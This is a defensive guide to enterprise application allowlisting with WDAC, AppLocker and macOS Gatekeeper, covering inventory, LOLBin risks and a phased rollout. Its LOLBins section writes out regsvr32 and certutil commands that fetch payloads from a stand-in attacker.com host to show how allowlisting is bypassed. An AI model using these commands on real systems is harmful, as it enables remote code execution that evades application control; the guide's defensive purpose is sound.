Application Allowlisting for Enterprises: WDAC, AppLocker, and Blocking Unauthorized Code Execution

Microsoft provides two application control mechanisms for Windows: Windows Defender Application Control (WDAC) and AppLocker. They are not equivalent, and Microsoft has been explicit since 2022 that WDAC is the strategic direction.

AppLocker: AppLocker was introduced in Windows 7 and enforces application control at the application layer. Policies are configured via Group Policy and define rules based on publisher (code signing certificate), file path, or file hash. AppLocker is enforced by the Application Identity service (AppIDSvc), which runs as a user-mode service with SYSTEM privileges. The enforcement gap: any process running with SYSTEM privilege can disable the AppIDSvc service and bypass AppLocker enforcement. Administrators and attackers who have achieved local admin can disable AppLocker. AppLocker is suitable as a basic application control layer but should not be relied upon as the sole defense against sophisticated adversaries who have achieved administrative access.

Windows Defender Application Control (WDAC): WDAC enforces application control at the kernel level using Windows' Code Integrity driver (ci.dll), which is protected by Windows Hypervisor-Protected Code Integrity (HVCI) when virtualization-based security is enabled. Policy is compiled into a binary and can be enforced without relying on a user-mode service that can be disabled. WDAC is not bypassable by a process with administrative privileges alone (bypassing WDAC requires defeating kernel-level enforcement, which HVCI makes significantly harder). WDAC is the correct choice for all new deployments. AppLocker is not deprecated, but Microsoft recommends WDAC for stronger security guarantees.

Key WDAC policy types:

• Signed and reputable policy: Allows all Microsoft-signed code plus code identified as reputable by Microsoft's Intelligent Security Graph (ISG). The lowest-friction starting point; allows most legitimate enterprise software without explicit rules.
• Allow-listing by publisher: Allows code signed by specific publishers (Microsoft, Adobe, your internal code signing certificate). Requires maintaining the publisher list as software is added.
• Allow-listing by hash: The most restrictive option; allows only specific file versions by hash. Any software update requires hash list update.

Recommended starting configuration: Deploy WDAC in audit mode (logging violations without blocking) using the signed-and-reputable policy as the base, then add publisher and path rules for business-critical software not covered by the ISG. Transition to enforce mode after the audit log has been reviewed and the policy refined.

You cannot allowlist what you do not know about. Building an accurate application inventory is the most time-consuming part of an allowlisting deployment -- and skipping it is why most allowlisting projects fail.

Application inventory collection methods:

WDAC audit mode: Deploy a WDAC audit mode policy (using the base Microsoft policy) with no restrictions. WDAC logs every application execution to the Windows event log (Application and Services > Microsoft > Windows > CodeIntegrity > Operational, Event ID 3076 for audit mode violations). Collect these logs across your fleet for 30-60 days to capture the full application execution universe, including quarterly processes and rarely-used tools.

Software inventory from endpoint management: SCCM, Intune, and third-party endpoint management platforms maintain installed application lists. These capture installed software but miss scripts, portable executables, and tools run without installation.

Process execution monitoring from EDR: EDR platforms (CrowdStrike, SentinelOne, Microsoft Defender for Endpoint) log every process execution. Export 30 days of process execution telemetry and identify distinct executables, their signing certificate information, and their frequency of execution. Rarely executed applications are the most likely to be missed in an allowlist.

Application discovery by business unit: Send a structured survey to IT, engineering, finance, HR, and other business units asking them to list every application used by their team, including tools installed locally, scripts run from network shares, and web-based tools that use locally installed components. Supplement with ad-hoc interviews with power users who often have custom tooling not visible to central IT.

The long tail problem: The standard enterprise application list covers 80-90% of execution volume. The remaining 10-20% is the long tail: legacy tools used by one team, scripts written by a specific developer, vendor-specific utilities for a piece of equipment, and administrative tools. The long tail takes disproportionate time to document and will generate the most friction during enforce-mode deployment.

Living Off the Land Binaries (LOLBins) are legitimate operating system binaries that attackers use to execute malicious code, evade detection, and maintain persistence -- specifically to bypass application control policies that allow all signed Microsoft binaries.

If your allowlisting policy allows all Microsoft-signed code (a common configuration), the following binaries can be used by attackers to execute arbitrary code while satisfying the allowlisting policy:

• mshta.exe: Executes HTML Application files (.hta), which can contain VBScript or JScript. Used to download and execute remote payloads.
• regsvr32.exe: Originally for registering COM DLLs; can execute arbitrary .sct (scriptlet) files from remote URLs (regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll)
• certutil.exe: Certificate utility; can download files from the internet (certutil -urlcache -f http://attacker.com/payload.exe) and decode base64.
• wscript.exe / cscript.exe: Execute VBScript and JScript files; legitimate scripting engines that can run malicious scripts.
• PowerShell.exe: The most powerful LOLBin; can download and execute code, bypass Execution Policy, and enable fileless execution.
• rundll32.exe: Executes DLL functions; abused to load malicious DLLs by attackers who have placed a DLL in a user-writable path.
• msiexec.exe: Windows Installer; can install packages from remote URLs, executing arbitrary code during installation.

Blocking LOLBins without breaking legitimate functionality: Many LOLBins have legitimate uses that make blanket blocking impractical. The more effective approach:

• Constrained Language Mode for PowerShell: Configure PowerShell to run in Constrained Language Mode when the WDAC policy is in enforce mode. Constrained Language Mode significantly limits PowerShell's ability to be used as an attack platform while preserving its utility for administrative scripting.
• Script rules in WDAC: WDAC supports script enforcement rules that require scripts (.ps1, .vbs, .js) to be signed. Require PowerShell script signing for scripts running from network locations.
• Block specific LOLBin usage patterns: Use AppLocker or WDAC path rules to restrict the arguments or child process relationships for high-risk LOLBins. Block mshta.exe from launching browser processes; block certutil.exe from writing to user profile directories.

The transition from audit mode to enforce mode is where most allowlisting projects stall. Enforce mode blocks unauthorized execution; every application not on the allowlist fails silently (from the user's perspective) or produces an error. Managing this transition requires a structured rollout.

Phase 1 -- Audit mode deployment (weeks 1-8): Deploy WDAC audit mode policy fleet-wide. Collect execution logs centrally (forward to SIEM or use Microsoft's WDAC Wizard policy merging capabilities). Review logs weekly to identify execution patterns not covered by the base policy. Add publisher rules, path rules, or hash rules for identified legitimate applications. Target: reduce the daily audit log violation count to near zero before proceeding to enforce mode.

Phase 2 -- Pilot enforce mode (weeks 9-12): Enable enforce mode on a pilot group of 50-100 endpoints, selected to represent a cross-section of the organization's application usage. Monitor helpdesk tickets for "application not working" reports; these indicate allowlist gaps. Resolve gaps by adding rules to the policy. Target: fewer than 5 helpdesk tickets per 100 pilot endpoints per week before expanding.

Phase 3 -- Gradual fleet rollout (weeks 13-26): Roll out enforce mode in waves by department or business unit, starting with the most standardized endpoint populations (executive assistants, call center, customer service) and finishing with the most diverse application users (developers, security engineers, finance analysts with specialized tools). Maintain an escalation process for blocking emergencies: IT staff who can temporarily add exceptions while the permanent policy rule is developed.

Ongoing policy maintenance: Allowlisting is not a deploy-and-forget control. Software updates change binary hashes; new applications are acquired; developers install new tools. Establish a monthly policy review cycle and a process for requesting new application additions. New application requests should require: business justification, confirmation that the application is signed by a trusted publisher, and security review for applications with elevated privilege requirements.

macOS application control operates through a different mechanism than Windows but achieves similar goals through MDM-enforced restrictions and the macOS security architecture.

Gatekeeper: Gatekeeper is Apple's built-in application execution control. It verifies that applications are either from the App Store, signed by an identified developer (Apple Developer Program member with a valid signing certificate), or notarized by Apple (submitted to Apple for malware scanning before distribution). Gatekeeper is enabled by default and should be enforced via MDM to prevent users from disabling it.

MDM enforcement of Gatekeeper: deploy a macOS configuration profile with AllowIdentifiedDevelopers = true and EnableAssessment = true. The most restrictive setting -- App Store only -- is impractical for enterprise environments with legitimate third-party software.

WDAC for macOS (preview as of 2026): Microsoft extended WDAC to macOS as part of Microsoft Intune endpoint security. WDAC for macOS uses the Endpoint Security Framework (ESF) -- the same kernel extension framework used by Jamf Protect and other macOS EDR tools -- to enforce application control policies. For organizations using Intune for macOS management, WDAC for Mac provides a unified Windows/macOS application control policy framework.

macOS-specific allowlisting challenges: Developer workstations running macOS are the most difficult application control target because developers routinely install build tools, language runtimes (Python, Node.js, Ruby), and utility packages (via Homebrew) that have unpredictable execution paths and signing status. Options:

• Separate allowlisting policy for developer workstations with more permissive rules
• Require all developer tools to be installed through Homebrew with a centrally approved Brewfile
• Use Jamf Pro's Restricted Software feature to block specific applications by name or signing certificate